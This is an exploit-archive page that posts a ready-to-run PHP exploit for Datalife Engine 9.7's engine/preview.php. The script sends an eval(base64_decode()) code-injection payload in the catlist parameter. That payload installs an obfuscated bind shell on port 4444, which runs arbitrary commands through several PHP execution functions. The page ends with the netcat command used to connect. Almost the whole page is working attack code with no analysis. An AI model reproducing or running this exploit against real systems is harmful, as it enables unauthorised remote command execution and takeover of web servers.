exploit the possibilities

Datalife Engine 9.7 preview.php Bindshell

Datalife Engine 9.7 preview.php Bindshell
Posted Dec 14, 2015
Authored by Saeid Bostandoust

Datalife Engine version 9.7 engine/preview.php bindshell exploit that binds a shell to port 4444.

tags | exploit, shell, php
MD5 | 33cdf373e6a195fe37856a161d80d3f5

Datalife Engine 9.7 preview.php Bindshell

Change Mirror Download
<?php

// Exploit Title: Datalife Engine 9.7 Bindshell Exploit
// Date: 13/12/2015
// Exploit Author: ssbostan
// Vendor Homepage: http://dleviet.com/
// Version: == 9.7
// Tested on: Datalife Engine 9.7
// CVE: http://www.cvedetails.com/cve/CVE-2013-1412/

$target="http://localhost/dle97/engine/preview.php";
$shellcode="ICAgIAogICAgICBAc2V0X3RpbWVfbGltaXQoMCk7IEBpZ25vcmVfdXNlcl9hYm9ydCgxKTsgQGluaV9zZXQoJ21heF9leGVjdXRpb25fdGltZScsMCk7CiAgICAgICR2WXFXPUBpbmlfZ2V0KCdkaXNhYmxlX2Z1bmN0aW9ucycpOwogICAgICBpZighZW1wdHkoJHZZcVcpKXsKICAgICAgICAkdllxVz1wcmVnX3JlcGxhY2UoJy9bLCBdKy8nLCAnLCcsICR2WXFXKTsKICAgICAgICAkdllxVz1leHBsb2RlKCcsJywgJHZZcVcpOwogICAgICAgICR2WXFXPWFycmF5X21hcCgndHJpbScsICR2WXFXKTsKICAgICAgfWVsc2V7CiAgICAgICAgJHZZcVc9YXJyYXkoKTsKICAgICAgfQogICAgICAKICAgICRwb3J0PTQ0NDQ7CgogICAgJHNjbD0nc29ja2V0X2NyZWF0ZV9saXN0ZW4nOwogICAgaWYoaXNfY2FsbGFibGUoJHNjbCkmJiFpbl9hcnJheSgkc2NsLCR2WXFXKSl7CiAgICAgICRzb2NrPUAkc2NsKCRwb3J0KTsKICAgIH1lbHNlewogICAgICAkc29jaz1Ac29ja2V0X2NyZWF0ZShBRl9JTkVULFNPQ0tfU1RSRUFNLFNPTF9UQ1ApOwogICAgICAkcmV0PUBzb2NrZXRfYmluZCgkc29jaywwLCRwb3J0KTsKICAgICAgJHJldD1Ac29ja2V0X2xpc3Rlbigkc29jayw1KTsKICAgIH0KICAgICRtc2dzb2NrPUBzb2NrZXRfYWNjZXB0KCRzb2NrKTsKICAgIEBzb2NrZXRfY2xvc2UoJHNvY2spOwoKICAg.IHdoaWxlKEZBTFNFIT09QHNvY2tldF9zZWxlY3QoJHI9YXJyYXkoJG1zZ3NvY2spLCAkdz1OVUxMLCAkZT1OVUxMLCBOVUxMKSkKICAgIHsKICAgICAgJG8gPSAnJzsKICAgICAgJGM9QHNvY2tldF9yZWFkKCRtc2dzb2NrLDIwNDgsUEhQX05PUk1BTF9SRUFEKTsKICAgICAgaWYoRkFMU0U9PT0kYyl7YnJlYWs7fQogICAgICBpZihzdWJzdHIoJGMsMCwzKSA9PSAnY2QgJyl7CiAgICAgICAgY2hkaXIoc3Vic3RyKCRjLDMsLTEpKTsKICAgICAgfSBlbHNlIGlmIChzdWJzdHIoJGMsMCw0KSA9PSAncXVpdCcgfHwgc3Vic3RyKCRjLDAsNCkgPT0gJ2V4aXQnKSB7CiAgICAgICAgYnJlYWs7CiAgICAgIH1lbHNlewogICAgICAgIAogICAgICBpZiAoRkFMU0UgIT09IHN0cnBvcyhzdHJ0b2xvd2VyKFBIUF9PUyksICd3aW4nICkpIHsKICAgICAgICAkYz0kYy4iIDI.chr(43).JjFcbiI7CiAgICAgIH0KICAgICAgJHlSclI9J2lzX2NhbGxhYmxlJzsKICAgICAgJEhEUkQ9J2luX2FycmF5JzsKICAgICAgCiAgICAgIGlmKCR5UnJSKCdzaGVsbF9leGVjJylhbmQhJEhEUkQoJ3NoZWxsX2V4ZWMnLCR2WXFXKSl7CiAgICAgICAgJG89c2hlbGxfZXhlYygkYyk7CiAgICAgIH1lbHNlCiAgICAgIGlmKCR5UnJSKCdzeXN0ZW0nKWFuZCEkSERSRCgnc3lzdGVtJywkdllxVykpewogICAgICAgIG9iX3N0YXJ0KCk7.CiAgICAgICAgc3lzdGVtKCRjKTsKICAgICAgICAkbz1vYl9nZXRfY29udGVudHMoKTsKICAgICAgICBvYl9lbmRfY2xlYW4oKTsKICAgICAgfWVsc2UKICAgICAgaWYoJHlSclIoJ3Byb2Nfb3BlbicpYW5kISRIRFJEKCdwcm9jX29wZW4nLCR2WXFXKSl7CiAgICAgICAgJGhhbmRsZT1wcm9jX29wZW4oJGMsYXJyYXkoYXJyYXkocGlwZSwncicpLGFycmF5KHBpcGUsJ3cnKSxhcnJheShwaXBlLCd3JykpLCRwaXBlcyk7CiAgICAgICAgJG89TlVMTDsKICAgICAgICB3aGlsZSghZmVvZigkcGlwZXNbMV0pKXsKICAgICAgICAgICRvLj1mcmVhZCgkcGlwZXNbMV0sMTAyNCk7CiAgICAgICAgfQogICAgICAgIEBwcm9jX2Nsb3NlKCRoYW5kbGUpOwogICAgICB9ZWxzZQogICAgICBpZigkeVJyUignZXhlYycpYW5kISRIRFJEKCdleGVjJywkdllxVykpewogICAgICAgICRvPWFycmF5KCk7CiAgICAgICAgZXhlYygkYywkbyk7CiAgICAgICAgJG89am9pbihjaHIoMTApLCRvKS5jaHIoMTApOwogICAgICB9ZWxzZQogICAgICBpZigkeVJyUigncGFzc3RocnUnKWFuZCEkSERSRCgncGFzc3RocnUnLCR2WXFXKSl7CiAgICAgICAgb2Jfc3RhcnQoKTsKICAgICAgICBwYXNzdGhydSgkYyk7CiAgICAgICAgJG89b2JfZ2V0X2NvbnRlbnRzKCk7CiAgICAgICAgb2JfZW5kX2NsZWFuKCk7CiAgICAgIH1.lbHNlCiAgICAgIGlmKCR5UnJSKCdwb3BlbicpYW5kISRIRFJEKCdwb3BlbicsJHZZcVcpKXsKICAgICAgICAkZnA9cG9wZW4oJGMsJ3InKTsKICAgICAgICAkbz1OVUxMOwogICAgICAgIGlmKGlzX3Jlc291cmNlKCRmcCkpewogICAgICAgICAgd2hpbGUoIWZlb2YoJGZwKSl7CiAgICAgICAgICAgICRvLj1mcmVhZCgkZnAsMTAyNCk7CiAgICAgICAgICB9CiAgICAgICAgfQogICAgICAgIEBwY2xvc2UoJGZwKTsKICAgICAgfWVsc2UKICAgICAgewogICAgICAgICRvPTA7CiAgICAgIH0KICAgIAogICAgICB9CiAgICAgIEBzb2NrZXRfd3JpdGUoJG1zZ3NvY2ssJG8sc3RybGVuKCRvKSk7CiAgICB9CiAgICBAc29ja2V0X2Nsb3NlKCRtc2dzb2NrKTsK";
$ch=curl_init();
curl_setopt($ch, CURLOPT_POST, TRUE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_POSTFIELDS, "catlist[0]=99999')||eval(base64_decode(\"$shellcode\"));//");
curl_setopt($ch, CURLOPT_URL, $target);
curl_exec($ch);
curl_close($ch);

// php dle-97-preview-bindshell.php
// nc localhost 4444

?>
Login or Register to add favorites

File Archive:

September 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    20 Files
  • 2
    Sep 2nd
    15 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    4 Files
  • 5
    Sep 5th
    1 Files
  • 6
    Sep 6th
    1 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    27 Files
  • 9
    Sep 9th
    7 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    9 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    25 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    15 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    12 Files
  • 19
    Sep 19th
    1 Files
  • 20
    Sep 20th
    1 Files
  • 21
    Sep 21st
    15 Files
  • 22
    Sep 22nd
    21 Files
  • 23
    Sep 23rd
    7 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close